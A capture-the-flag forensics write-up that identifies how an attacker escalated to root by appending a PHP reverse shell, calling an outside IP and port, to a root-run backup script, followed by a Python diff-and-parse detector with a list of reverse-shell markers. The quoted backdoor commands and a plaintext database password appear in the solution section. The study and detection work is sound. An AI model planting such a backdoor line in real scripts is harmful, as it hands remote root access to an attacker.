Escalation

Challenge:

Somehow, the attacker was able to gain root access to the web server. We believe the attacker leveraged an existing file to gain root access. What file was modified to allow the attacker to gain root on the web server?

Submit the name of the file and the name of the variable used to store the added command. Example: flag{backdoor.exe_var1} if backdoor.exe is the name of the file and var1 is the name of the variable.

Use the packet capture from Scans.

Solution:

While solving the earlier challenge, Scans, we identified a number of network streams containing remote shell traffic. Using that as a starting point for this challenge, we reviewed those streams in Wireshark. At the very end of stream 4999 we can see the attacker appending two lines to the existing script /opt/backup.py so that, when the script next runs, it opens a connection to 165.227.73.138:4815 and attaches an interactive bash shell to that connection (a reverse shell).

/>echo "cmd=\"php -r '\$sock=fsockopen(\\\"165.227.73.138\\\",4815);exec(\\\"/bin/bash -i <&3 >&3 2>&3\\\");'\"" >> /opt/backup.py
/>echo "popen(cmd)" >> /opt/backup.py
/>cat /opt/backup.py
#!/usr/bin/env python3
from os import popen
popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz')

cmd="php -r '$sock=fsockopen(\"165.227.73.138\",4815);exec(\"/bin/bash -i <&3 >&3 2>&3\");'"
popen(cmd)
/>exit

The accepted flag was: flag{backup.py_cmd}
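As an added example that is not part of the original writeup, the check below rebuilds the pre-intrusion script from the `cat` output above as a constructed baseline, diffs it against the modified copy, and parses only the appended lines to recover which variable holds the injected command and whether that command looks like a reverse shell. The baseline text, the marker list and the set of shell-executing call names are assumptions for the demonstration.

```python
import ast
import difflib

# Indicators that a command string opens a network socket and attaches a shell to it (assumed list).
REVERSE_SHELL_MARKERS = ("fsockopen", "/dev/tcp/", "bash -i", "nc -e", "socket.connect")
SHELL_RUNNERS = {"popen", "system", "call", "run", "Popen", "check_output"}  # hand a string to a shell/child process

# Constructed sample: the backup script as it existed before the appended lines.
BASELINE = """#!/usr/bin/env python3
from os import popen
popen('mysqldump -u backup -pbackup123 esu | gzip > /backups/backup_esu_$(date "+%Y%m%d%H%M%S").sql.gz')
"""

# Constructed sample: the same script after the two lines appended in stream 4999.
MODIFIED = BASELINE + """
cmd="php -r '$sock=fsockopen(\\"165.227.73.138\\",4815);exec(\\"/bin/bash -i <&3 >&3 2>&3\\");'"
popen(cmd)
"""

def added_lines(baseline, current):
    """Lines present in the current file but absent from the baseline copy."""
    diff = difflib.ndiff(baseline.splitlines(), current.splitlines())
    return [line[2:] for line in diff if line.startswith("+ ")]

def find_injected_commands(baseline, current):
    """Parse only the added lines; return (variable, command, is_reverse_shell) for each
    string handed to a shell-executing call ('<literal>' when passed directly)."""
    tree = ast.parse("\n".join(added_lines(baseline, current)))
    strings = {}  # variable name -> string value assigned in the added lines
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and isinstance(node.value, ast.Constant) and isinstance(node.value.value, str):
            for target in node.targets:
                if isinstance(target, ast.Name):
                    strings[target.id] = node.value.value
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = getattr(node.func, "id", getattr(node.func, "attr", ""))  # popen(...) or os.popen(...)
        if name not in SHELL_RUNNERS:
            continue
        for arg in node.args:
            if isinstance(arg, ast.Name) and arg.id in strings:
                var, command = arg.id, strings[arg.id]
            elif isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                var, command = "<literal>", arg.value
            else:
                continue
            hits.append((var, command, any(m in command for m in REVERSE_SHELL_MARKERS)))
    return hits
```

Running `find_injected_commands(BASELINE, MODIFIED)` reports the variable `cmd` with the reverse-shell flag set, which is exactly the pair the challenge asks for; the same diff-then-parse approach works for any scheduled script whose known-good copy is kept in a baseline store.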
